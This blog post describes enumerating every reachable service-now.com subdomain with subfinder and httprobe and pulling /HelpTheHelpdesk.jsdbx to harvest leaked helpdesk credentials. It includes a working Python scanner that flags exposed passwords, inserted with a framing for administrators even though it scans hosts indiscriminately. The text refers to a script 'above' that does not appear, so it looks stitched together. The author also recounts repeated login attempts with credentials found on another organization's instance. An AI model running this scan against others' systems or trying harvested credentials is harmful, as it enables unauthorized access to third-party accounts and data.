After reading the blog post on PortSwigger about ServiceNow admin credentials being exposed, I started to wonder whether all of the credentials had already been gathered. I got to work without a moment's delay, but then realized that I didn't know how to find subdomains. All I knew was that there could be login credentials at *.service-now.com/HelpTheHelpdesk.jsdbx. I visualized all the steps in my mind.
I had to find the subdomains (*.service-now.com), then send a GET request to the /HelpTheHelpdesk.jsdbx endpoint on each one and check the response automatically. The most challenging part of this process was automating the GET request and checking the response.
After some quick research, I found subfinder and cloned it. I ran the command below.
subfinder -d service-now.com -o subdomains.txt
But there was a problem I hadn't anticipated: not all of the subdomains were live, and checking which ones were live by hand was impractical.
`httprobe` saved the situation. I fed subdomains.txt to httprobe and it produced a new file, livesubdomains.txt, containing only the live subdomains.
How would I send a GET request to the endpoint and check the response? I didn't know yet. I Googled it and wrote my own script with the help of the Python requests library.
I know that the code is neither the fastest nor the most efficient, but at least it works as intended. I would appreciate any feedback or suggestions you may have.
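The check the script above performs, written out here as an added example (not the author's script) so that an administrator can run it against the instances they own: it reads the httprobe output, fetches /HelpTheHelpdesk.jsdbx from each host and reports whether the response has no credentials, empty credentials, or a non-empty httpPassword. The `httpPassword = "..."` assignment pattern is an assumption based on the post's description, and the sample bodies are constructed, not real responses.

```python
import re
import sys
import urllib.request

# Constructed sample bodies (not real responses) modelled on the post's
# description of `httpPassword = ""` / `httpUsername = ""` assignments.
SAMPLE_EMPTY = 'var httpUsername = ""; var httpPassword = "";'
SAMPLE_SET = 'var httpUsername = "helpdesk"; var httpPassword = "example-secret";'
SAMPLE_NONE = "<html><body>Instance not found</body></html>"

# Assumed assignment shape; tolerant of spacing and of single or double quotes.
_ASSIGN = re.compile(r'(httpUsername|httpPassword)\s*=\s*(["\'])(.*?)\2')


def parse_credentials(body):
    """Return {name: value} for the httpUsername/httpPassword assignments in body."""
    return {name: value for name, _quote, value in _ASSIGN.findall(body)}


def classify(body):
    """absent: no httpPassword keyword; empty: present but blank; exposed: non-empty."""
    creds = parse_credentials(body)
    if "httpPassword" not in creds:
        return "absent"
    return "exposed" if creds["httpPassword"] else "empty"


def check_host(host, timeout=10):
    """Fetch the endpoint over HTTPS for one host and classify the body (network call)."""
    url = f"https://{host}/HelpTheHelpdesk.jsdbx"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return classify(resp.read().decode("utf-8", "replace"))
    except Exception as exc:  # unreachable host, TLS failure, 4xx/5xx
        return f"error: {exc.__class__.__name__}"


if __name__ == "__main__":
    # Usage: python check_helpdesk.py livesubdomains.txt (one host per line, as httprobe writes it)
    with open(sys.argv[1]) as fh:
        for line in fh:
            host = line.strip().removeprefix("https://").removeprefix("http://")
            if host:
                print(host, check_host(host))
```

Only "exposed" results need follow-up; "empty" matches are the already-cleared credentials the post describes.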
I received multiple responses containing the httpPassword = keyword, but all except one had empty credentials (httpPassword = "" and httpUsername = ""). All of these credentials had been deleted except one.
No matter how many times I tried to log in with those credentials, I unfortunately couldn't log in successfully. Nevertheless, I prepared a proper report and sent it.
I was not the person who discovered that vulnerability, but I wish I were. I learned a lot from the experience and I always strive to learn and share what I know. If you have any feedback, feel free to reach out to me.